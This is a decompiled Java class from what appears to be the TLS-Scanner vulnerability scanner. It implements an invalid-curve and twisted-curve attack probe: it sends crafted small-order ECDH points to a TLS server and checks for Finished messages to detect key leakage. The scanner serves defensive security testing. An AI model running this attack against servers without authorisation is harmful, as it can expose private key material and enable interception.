package de.rub.nds.tlsscanner.serverscanner.probe.invalidcurve;

import de.rub.nds.modifiablevariable.ModifiableVariableFactory;
import de.rub.nds.modifiablevariable.bytearray.ByteArrayModificationFactory;
import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray;
import de.rub.nds.modifiablevariable.util.ArrayConverter;
import de.rub.nds.tlsattacker.core.config.Config;
import de.rub.nds.tlsattacker.core.constants.CipherSuite;
import de.rub.nds.tlsattacker.core.constants.ECPointFormat;
import de.rub.nds.tlsattacker.core.constants.HandshakeMessageType;
import de.rub.nds.tlsattacker.core.constants.NamedGroup;
import de.rub.nds.tlsattacker.core.constants.PskKeyExchangeMode;
import de.rub.nds.tlsattacker.core.crypto.ec.CurveFactory;
import de.rub.nds.tlsattacker.core.crypto.ec.EllipticCurve;
import de.rub.nds.tlsattacker.core.crypto.ec.EllipticCurveOverFp;
import de.rub.nds.tlsattacker.core.crypto.ec.FieldElementFp;
import de.rub.nds.tlsattacker.core.crypto.ec.Point;
import de.rub.nds.tlsattacker.core.crypto.ec.PointFormatter;
import de.rub.nds.tlsattacker.core.crypto.ec.RFC7748Curve;
import de.rub.nds.tlsattacker.core.protocol.message.HandshakeMessage;
import de.rub.nds.tlsattacker.core.state.State;
import de.rub.nds.tlsattacker.core.workflow.ParallelExecutor;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTrace;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTraceUtil;
import de.rub.nds.tlsattacker.core.workflow.task.TlsTask;
import de.rub.nds.tlsscanner.core.vector.response.FingerprintSecretPair;
import de.rub.nds.tlsscanner.serverscanner.probe.SessionTicketZeroKeyProbe;
import de.rub.nds.tlsscanner.serverscanner.probe.invalidcurve.constants.InvalidCurveScanType;
import de.rub.nds.tlsscanner.serverscanner.probe.invalidcurve.constants.InvalidCurveWorkflowType;
import de.rub.nds.tlsscanner.serverscanner.probe.invalidcurve.point.InvalidCurvePoint;
import de.rub.nds.tlsscanner.serverscanner.probe.invalidcurve.point.TwistedCurvePoint;
import de.rub.nds.tlsscanner.serverscanner.probe.invalidcurve.trace.InvalidCurveWorkflowGenerator;
import de.rub.nds.tlsscanner.serverscanner.probe.invalidcurve.vector.InvalidCurveVector;
import de.rub.nds.tlsscanner.serverscanner.task.InvalidCurveTask;
import java.math.BigInteger;
import java.util.Iterator;
import java.util.LinkedList;
import java.util.List;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.bouncycastle.util.BigIntegers;

/* loaded from: input_file:de/rub/nds/tlsscanner/serverscanner/probe/invalidcurve/InvalidCurveAttacker.class */
public class InvalidCurveAttacker {
    private static final Logger LOGGER = LogManager.getLogger();
    private final ParallelExecutor executor;
    private Config tlsConfig;
    private InvalidCurveVector vector;
    private InvalidCurveScanType scanType;
    private double infinityProbability;
    private static final double ERROR_PROBABILITY = 1.0E-4d;
    private static final int LARGE_ORDER_ITERATIONS = 40;
    private static final int EXTENSION_FACTOR = 7;
    private int keyOffset;
    private int protocolFlows;
    private BigInteger publicPointBaseX;
    private BigInteger publicPointBaseY;
    private ECPointFormat pointCompressionFormat;
    private BigInteger curveTwistD;
    private BigInteger premasterSecret;
    private List<FingerprintSecretPair> responsePairs;
    private List<Point> receivedEcPublicKeys;
    private List<Point> finishedKeys;
    private boolean dirtyKeysWarning;

    /* JADX INFO: Access modifiers changed from: package-private */
    /* renamed from: de.rub.nds.tlsscanner.serverscanner.probe.invalidcurve.InvalidCurveAttacker$1, reason: invalid class name */
    /* loaded from: input_file:de/rub/nds/tlsscanner/serverscanner/probe/invalidcurve/InvalidCurveAttacker$1.class */
    public static /* synthetic */ class AnonymousClass1 {
        static final /* synthetic */ int[] $SwitchMap$de$rub$nds$tlsscanner$serverscanner$probe$invalidcurve$constants$InvalidCurveScanType = new int[InvalidCurveScanType.values().length];

        static {
            try {
                $SwitchMap$de$rub$nds$tlsscanner$serverscanner$probe$invalidcurve$constants$InvalidCurveScanType[InvalidCurveScanType.REGULAR.ordinal()] = 1;
            } catch (NoSuchFieldError e) {
            }
            try {
                $SwitchMap$de$rub$nds$tlsscanner$serverscanner$probe$invalidcurve$constants$InvalidCurveScanType[InvalidCurveScanType.EXTENDED.ordinal()] = 2;
            } catch (NoSuchFieldError e2) {
            }
            try {
                $SwitchMap$de$rub$nds$tlsscanner$serverscanner$probe$invalidcurve$constants$InvalidCurveScanType[InvalidCurveScanType.REDUNDANT.ordinal()] = 3;
            } catch (NoSuchFieldError e3) {
            }
            try {
                $SwitchMap$de$rub$nds$tlsscanner$serverscanner$probe$invalidcurve$constants$InvalidCurveScanType[InvalidCurveScanType.LARGE_GROUP.ordinal()] = 4;
            } catch (NoSuchFieldError e4) {
            }
        }
    }

    public InvalidCurveAttacker(Config config, ParallelExecutor parallelExecutor, InvalidCurveVector invalidCurveVector, InvalidCurveScanType invalidCurveScanType, double d) {
        this.tlsConfig = config;
        this.executor = parallelExecutor;
        this.vector = invalidCurveVector;
        this.scanType = invalidCurveScanType;
        this.infinityProbability = d;
        setIterationFields();
        setPublicPointFields();
        prepareConfig();
    }

    public Boolean isVulnerable() {
        EllipticCurve curve;
        Point createPoint;
        BigInteger mod;
        this.responsePairs = new LinkedList();
        this.receivedEcPublicKeys = new LinkedList();
        this.finishedKeys = new LinkedList();
        this.dirtyKeysWarning = false;
        if (this.vector.isTwistAttack()) {
            curve = buildTwistedCurve();
            if (this.vector.getNamedGroup() == NamedGroup.ECDH_X25519 || this.vector.getNamedGroup() == NamedGroup.ECDH_X448) {
                RFC7748Curve curve2 = CurveFactory.getCurve(this.vector.getNamedGroup());
                mod = curve2.toWeierstrass(curve2.getPoint(this.publicPointBaseX, this.publicPointBaseY)).getFieldX().getData().multiply(this.curveTwistD).mod(curve.getModulus());
            } else {
                mod = this.publicPointBaseX.multiply(this.curveTwistD).mod(curve.getModulus());
            }
            createPoint = Point.createPoint(mod, this.publicPointBaseY, this.vector.getNamedGroup());
        } else {
            curve = CurveFactory.getCurve(this.vector.getNamedGroup());
            createPoint = Point.createPoint(this.publicPointBaseX, this.publicPointBaseY, this.vector.getNamedGroup());
        }
        if (this.premasterSecret != null) {
            this.protocolFlows = 1;
        }
        LinkedList linkedList = new LinkedList();
        for (int i = 1; i <= this.protocolFlows; i++) {
            setPremasterSecret(curve, i + this.keyOffset, createPoint);
            linkedList.add(new InvalidCurveTask(buildState(), this.executor.getReexecutions(), i + this.keyOffset));
        }
        this.executor.bulkExecuteTasks(linkedList);
        return evaluateExecutedTasks(linkedList);
    }

    private void setPremasterSecret(EllipticCurve ellipticCurve, int i, Point point) {
        BigInteger bigInteger = new BigInteger(i);
        if (this.vector.getNamedGroup() == NamedGroup.ECDH_X25519 || this.vector.getNamedGroup() == NamedGroup.ECDH_X448) {
            bigInteger = CurveFactory.getCurve(this.vector.getNamedGroup()).decodeScalar(bigInteger);
        }
        Point mult = ellipticCurve.mult(bigInteger, point);
        if (mult.getFieldX() == null) {
            this.premasterSecret = BigInteger.ZERO;
        } else {
            this.premasterSecret = mult.getFieldX().getData();
            if (this.vector.isTwistAttack()) {
                this.premasterSecret = this.premasterSecret.multiply(this.curveTwistD.modInverse(ellipticCurve.getModulus())).mod(ellipticCurve.getModulus());
                if (this.vector.getNamedGroup() == NamedGroup.ECDH_X25519 || this.vector.getNamedGroup() == NamedGroup.ECDH_X448) {
                    RFC7748Curve curve = CurveFactory.getCurve(this.vector.getNamedGroup());
                    this.premasterSecret = curve.toMontgomery(curve.getPoint(this.premasterSecret, mult.getFieldY().getData())).getFieldX().getData();
                }
            }
            if (this.vector.getNamedGroup() == NamedGroup.ECDH_X25519 || this.vector.getNamedGroup() == NamedGroup.ECDH_X448) {
                this.premasterSecret = new BigInteger(1, CurveFactory.getCurve(this.vector.getNamedGroup()).encodeCoordinate(this.premasterSecret));
            }
        }
        LOGGER.debug("PMS for scheduled Workflow Trace with secret " + i + ": " + this.premasterSecret.toString());
    }

    private State buildState() {
        RFC7748Curve curve = CurveFactory.getCurve(this.vector.getNamedGroup());
        ModifiableByteArray createByteArrayModifiableVariable = ModifiableVariableFactory.createByteArrayModifiableVariable();
        Point point = new Point(new FieldElementFp(this.publicPointBaseX, curve.getModulus()), new FieldElementFp(this.publicPointBaseY, curve.getModulus()));
        createByteArrayModifiableVariable.setModification(ByteArrayModificationFactory.explicitValue(curve instanceof RFC7748Curve ? curve.encodeCoordinate(point.getFieldX().getData()) : PointFormatter.formatToByteArray(this.vector.getNamedGroup(), point, this.pointCompressionFormat)));
        ModifiableByteArray createByteArrayModifiableVariable2 = ModifiableVariableFactory.createByteArrayModifiableVariable();
        byte[] asUnsignedByteArray = BigIntegers.asUnsignedByteArray(ArrayConverter.bigIntegerToByteArray(curve.getModulus()).length, this.premasterSecret);
        createByteArrayModifiableVariable2.setModification(ByteArrayModificationFactory.explicitValue(asUnsignedByteArray));
        this.tlsConfig.setWorkflowExecutorShouldClose(false);
        Config createCopy = this.tlsConfig.createCopy();
        return new State(createCopy, this.vector.isAttackInRenegotiation() ? InvalidCurveWorkflowGenerator.generateWorkflow(InvalidCurveWorkflowType.RENEGOTIATION, createByteArrayModifiableVariable, createByteArrayModifiableVariable2, asUnsignedByteArray, createCopy) : InvalidCurveWorkflowGenerator.generateWorkflow(InvalidCurveWorkflowType.REGULAR, createByteArrayModifiableVariable, createByteArrayModifiableVariable2, asUnsignedByteArray, createCopy));
    }

    private EllipticCurveOverFp buildTwistedCurve() {
        EllipticCurveOverFp weierstrassEquivalent = (this.vector.getNamedGroup() == NamedGroup.ECDH_X25519 || this.vector.getNamedGroup() == NamedGroup.ECDH_X448) ? CurveFactory.getCurve(this.vector.getNamedGroup()).getWeierstrassEquivalent() : (EllipticCurveOverFp) CurveFactory.getCurve(this.vector.getNamedGroup());
        return new EllipticCurveOverFp(weierstrassEquivalent.getFieldA().getData().multiply(this.curveTwistD.pow(2)).mod(weierstrassEquivalent.getModulus()), weierstrassEquivalent.getFieldB().getData().multiply(this.curveTwistD.pow(3)).mod(weierstrassEquivalent.getModulus()), weierstrassEquivalent.getModulus());
    }

    private Boolean evaluateExecutedTasks(List<TlsTask> list) {
        boolean z = false;
        boolean z2 = false;
        boolean z3 = false;
        boolean z4 = false;
        Iterator<TlsTask> it = list.iterator();
        while (it.hasNext()) {
            InvalidCurveTask invalidCurveTask = (InvalidCurveTask) it.next();
            WorkflowTrace workflowTrace = invalidCurveTask.getState().getWorkflowTrace();
            if (!invalidCurveTask.isHasError()) {
                z = true;
                if (WorkflowTraceUtil.getLastReceivedMessage(workflowTrace) != null && (WorkflowTraceUtil.getLastReceivedMessage(workflowTrace) instanceof HandshakeMessage) && WorkflowTraceUtil.getLastReceivedMessage(workflowTrace).getHandshakeMessageType() == HandshakeMessageType.FINISHED) {
                    LOGGER.debug("Received a finished Message using secret: " + invalidCurveTask.getAppliedSecret() + "! Server is vulnerable!");
                    this.finishedKeys.add(invalidCurveTask.getReceivedEcKey());
                    z2 = true;
                } else {
                    LOGGER.debug("Received no finished Message using secret" + invalidCurveTask.getAppliedSecret());
                }
                if (invalidCurveTask.getReceivedEcKey() != null) {
                    z3 = true;
                    getReceivedEcPublicKeys().add(invalidCurveTask.getReceivedEcKey());
                }
            } else if (invalidCurveTask.getReceivedEcKey() != null) {
                z4 = true;
                getReceivedEcPublicKeys().add(invalidCurveTask.getReceivedEcKey());
            }
            this.responsePairs.add(new FingerprintSecretPair(invalidCurveTask.getFingerprint(), invalidCurveTask.getAppliedSecret()));
        }
        if (this.vector.isAttackInRenegotiation() && z3 && z4) {
            this.dirtyKeysWarning = true;
        }
        if (z) {
            return z2;
        }
        return null;
    }

    public List<FingerprintSecretPair> getResponsePairs() {
        return this.responsePairs;
    }

    public boolean isDirtyKeysWarning() {
        return this.dirtyKeysWarning;
    }

    public List<Point> getFinishedKeys() {
        return this.finishedKeys;
    }

    public List<Point> getReceivedEcPublicKeys() {
        return this.receivedEcPublicKeys;
    }

    private void setIterationFields() {
        if (this.vector.getNamedGroup() == NamedGroup.ECDH_X25519 || this.vector.getNamedGroup() == NamedGroup.ECDH_X448) {
            this.protocolFlows = 1;
            return;
        }
        int ceil = (int) Math.ceil(Math.log(ERROR_PROBABILITY) / Math.log(1.0d - (2.0d * this.infinityProbability)));
        switch (AnonymousClass1.$SwitchMap$de$rub$nds$tlsscanner$serverscanner$probe$invalidcurve$constants$InvalidCurveScanType[this.scanType.ordinal()]) {
            case 1:
                this.keyOffset = 0;
                this.protocolFlows = ceil;
                return;
            case SessionTicketZeroKeyProbe.SESSION_STATE_LEN_FIELD_LEN /* 2 */:
                this.keyOffset = ceil;
                this.protocolFlows = (ceil * EXTENSION_FACTOR) - ceil;
                return;
            case 3:
                this.keyOffset = 0;
                this.protocolFlows = ceil * EXTENSION_FACTOR;
                return;
            case 4:
                this.keyOffset = 0;
                this.protocolFlows = LARGE_ORDER_ITERATIONS;
                return;
            default:
                return;
        }
    }

    private void setPublicPointFields() {
        if (this.scanType == InvalidCurveScanType.REGULAR || this.scanType == InvalidCurveScanType.EXTENDED) {
            if (!this.vector.isTwistAttack()) {
                this.publicPointBaseX = InvalidCurvePoint.smallOrder(this.vector.getNamedGroup()).getPublicPointBaseX();
                this.publicPointBaseY = InvalidCurvePoint.smallOrder(this.vector.getNamedGroup()).getPublicPointBaseY();
                this.pointCompressionFormat = ECPointFormat.UNCOMPRESSED;
                return;
            } else {
                this.curveTwistD = TwistedCurvePoint.smallOrder(this.vector.getNamedGroup()).getPointD();
                this.publicPointBaseX = TwistedCurvePoint.smallOrder(this.vector.getNamedGroup()).getPublicPointBaseX();
                this.publicPointBaseY = TwistedCurvePoint.smallOrder(this.vector.getNamedGroup()).getPublicPointBaseY();
                this.pointCompressionFormat = this.vector.getPointFormat();
                return;
            }
        }
        if (this.scanType == InvalidCurveScanType.REDUNDANT) {
            if (!this.vector.isTwistAttack()) {
                this.publicPointBaseX = InvalidCurvePoint.alternativeOrder(this.vector.getNamedGroup()).getPublicPointBaseX();
                this.publicPointBaseY = InvalidCurvePoint.alternativeOrder(this.vector.getNamedGroup()).getPublicPointBaseY();
                this.pointCompressionFormat = ECPointFormat.UNCOMPRESSED;
                return;
            } else {
                this.curveTwistD = TwistedCurvePoint.alternativeOrder(this.vector.getNamedGroup()).getPointD();
                this.publicPointBaseX = TwistedCurvePoint.alternativeOrder(this.vector.getNamedGroup()).getPublicPointBaseX();
                this.publicPointBaseY = TwistedCurvePoint.alternativeOrder(this.vector.getNamedGroup()).getPublicPointBaseY();
                this.pointCompressionFormat = this.vector.getPointFormat();
                return;
            }
        }
        if (this.scanType == InvalidCurveScanType.LARGE_GROUP) {
            if (!this.vector.isTwistAttack()) {
                this.publicPointBaseX = InvalidCurvePoint.largeOrder(this.vector.getNamedGroup()).getPublicPointBaseX();
                this.publicPointBaseY = InvalidCurvePoint.largeOrder(this.vector.getNamedGroup()).getPublicPointBaseY();
                this.pointCompressionFormat = ECPointFormat.UNCOMPRESSED;
            } else {
                this.curveTwistD = TwistedCurvePoint.largeOrder(this.vector.getNamedGroup()).getPointD();
                this.publicPointBaseX = TwistedCurvePoint.largeOrder(this.vector.getNamedGroup()).getPublicPointBaseX();
                this.publicPointBaseY = TwistedCurvePoint.largeOrder(this.vector.getNamedGroup()).getPublicPointBaseY();
                this.pointCompressionFormat = this.vector.getPointFormat();
            }
        }
    }

    private void prepareConfig() {
        if (this.vector.getProtocolVersion().isTLS13()) {
            LinkedList linkedList = new LinkedList();
            linkedList.add(this.vector.getNamedGroup());
            this.tlsConfig.setDefaultClientKeyShareNamedGroups(linkedList);
            this.tlsConfig.setAddPSKKeyExchangeModesExtension(true);
            LinkedList linkedList2 = new LinkedList();
            linkedList2.add(PskKeyExchangeMode.PSK_DHE_KE);
            this.tlsConfig.setPSKKeyExchangeModes(linkedList2);
        }
        this.tlsConfig.setHighestProtocolVersion(this.vector.getProtocolVersion());
        this.tlsConfig.setDefaultClientSupportedCipherSuites(new CipherSuite[]{this.vector.getCipherSuite()});
        this.tlsConfig.setDefaultClientNamedGroups(new NamedGroup[]{this.vector.getNamedGroup()});
        if (!this.vector.getEcdsaRequiredGroups().isEmpty()) {
            this.tlsConfig.getDefaultClientNamedGroups().addAll(this.vector.getEcdsaRequiredGroups());
        }
        this.tlsConfig.setStopReceivingAfterFatal(false);
        this.tlsConfig.setStopActionsAfterFatal(false);
        this.tlsConfig.setStopReceivingAfterWarning(false);
        this.tlsConfig.setStopActionsAfterWarning(false);
        this.tlsConfig.setWorkflowExecutorShouldClose(false);
    }
}
